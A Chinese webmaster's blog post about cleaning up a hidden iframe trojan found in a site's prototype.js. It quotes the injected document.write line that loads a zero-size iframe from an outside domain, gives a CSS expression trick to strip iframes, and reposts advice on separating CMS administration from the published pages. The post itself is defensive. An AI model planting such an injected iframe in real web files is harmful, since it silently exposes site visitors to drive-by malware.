网站被挂IFRAME木马

今天早晨刚上传完了仿DELL的网站，发现维护的其中一个网站打不开了。但是除首页之外的其他频道却打开正常。心中一阵狐疑！FTP链接上看看，index.asp应该发生了异常。覆盖玩INDEX.ASP文件之后，分别用IE7和傲游打开看，IE右下角报木马和恶意弹窗拦截，傲游显示Hack.Exploit.Script.JS.IE.a病毒，为瑞星报毒。晕倒！马上到空间瞧瞧，通过排查，发现在19日凌晨那个时间，有几个网站文件被改动，分别是include/pe.md5.asp;js/prototype.js;shop/search.asp;soft/showsoft.asp;
其中马就挂在prototype.js里面，这么一段话：document.write("<iframe src=http://www.gl18.com/editor/Dialog/help/1.asp width=0 height=0></iframe>");然后通过JS调用，强烈鄙视这家伙！（gl18.com桂林十八中学网站）
清除之后，然后注入一段代码销毁iframe，方法如下：销毁iframe：要防止iframe里的网页木马被下载的最好办法就是销毁iframe对象。如何实现呢？我们上面介绍了expression而expression是可以执行JS脚本的。
其语法格式如下：标记固有的CSS属性名expression(JS表达式) 或 自定义属性名expression(JS表达式)。
在这里，我们选择第二种，代码为：iframe{v:expression(JS表达式);}
使用销毁网页里所有的iframe对象方法：将iframe里的请求地址变成空白页(about:blank)，再将iframe对象从DOM(文档对象模型)中移除。
移除DOM节点：iframe{v:expression(this.src='about:blank',this.outerHTML='');}
说明：'v'是自定义的一个CSS属性，'this'代表所有将要描述外观的iframe对象，中间的逗号代表两句代码一起执行，'about:blank'代表空白页，'outerHTML'是用来移除DOM节点所用的属性。
使用方法在页面加入如下内容
<style>
iframe{v:expression(this.src='about:blank',this.outerHTML='');}
</style>
具体效果如何，以关后效！
之后对关于如何防范ASP程序的漏洞的问题，查找了一些资料，在动易的坛子里发现这样一篇文章：

---【转】------------------------------
目前，为了防范因asp漏洞引起的攻击，很多cms系统都采用“本地添加文章，然后把更新过的文章通过ftp方式上传到服务器”这个方法。

本人觉得这样做，效率很低，因为上传那么多文件，要好长时间。严重影响网站浏览者的观看效果。而且，最要命的是－－－－不同步。（比如你上传了首页，但是里面的文章页还没有上传完毕，那浏览者点击首页的文章题目，就会显示“找不到网页”的错误）

我觉得还可以通过另外一个方法来实现这个管理和发布分离的效果，就是：
准备两个虚拟主机空间（在同一个服务器），一个放动易管理程序，第二个虚拟主机放置生成后的html文件。
其中：第一个空间的域名不对外公布，只允许管理员自己知道。第二个空间，就是给浏览者看的。

管理员登录第一个空间，添加文章，点击生成的时候，自动把html文件生成到第二个空间里面。因为在同一个服务器上，所以生成的速度很快。

这样第二个空间里面的网站就完全和动易脱离了，即使动易漏洞百出，黑客也无能为力了。

补充说明：
1 如果asp无法实现跨虚拟主机生成htm的话，那可以考虑用动易的dll来实现。
2 有朋友觉得这样会增加开支。其实第一个空间只需要100-200m就够了。因为只放一个动易程序和数据库而已。第二个空间，跟你自己网站的规模购买即可。成本只增加了几百元，但是安全性确得到了很好的保障。值得！
3 至于互动性的问题。完全可以解决。动易自己拆分成两步分就可以了。把互动性部分放在第二个空间里面，并且有自己的数据库。（比如点击统计，访问统计，文章评论等等）
4 其实sina sohu这些大网站，也采用这些技术来实现的。不过他们是用不同的服务器。我们陷于资金限制，用虚拟主机当作服务器，效果是一样的。

如果能实现这个效果的话，黑客单纯通过asp漏洞来攻击，已经是不可能的了。这样可以使动易做的网站完全不用担心黑客攻击了，把精力放在网站发展上面即可！！！（完）

-------------------------------
下一个阶段如果还是出现问题，就考虑采取这样的方法对付一下了。

有时候对这些问题非但不头痛，还是感到很高兴的，因为问题的出现，就不得不促进我的学习，接触新的东西，这不！今天对几匹“马”都好好的研究了一下。几篇经典的文章都收录在，http://hi.oneun.cn里面；有遇到同样问题或者感兴趣的朋友都可以去看看。最后想说的是，这类问题是防不胜防的，比如服务器漏洞、浏览器漏洞、播放器漏洞、网站程序本身的漏洞等等因素都可能造成黑客的攻击，有些人纯粹只是为了好玩，从网络上学到点东西，就找个试验品实验一下而已。就那我这个被挂马的网站来说，本身基本上没什么流量，挂上了有鸡巴用，对他有什么好处哩，无非就是玩玩而已！网络的世界里本来就没有完美的程序和完美的开发人员，遇到问题我们不是怨天尤人，而应该冷静的思考解决问题的办法，这才是我们该做的。

最后，还是一句话，还要多学习！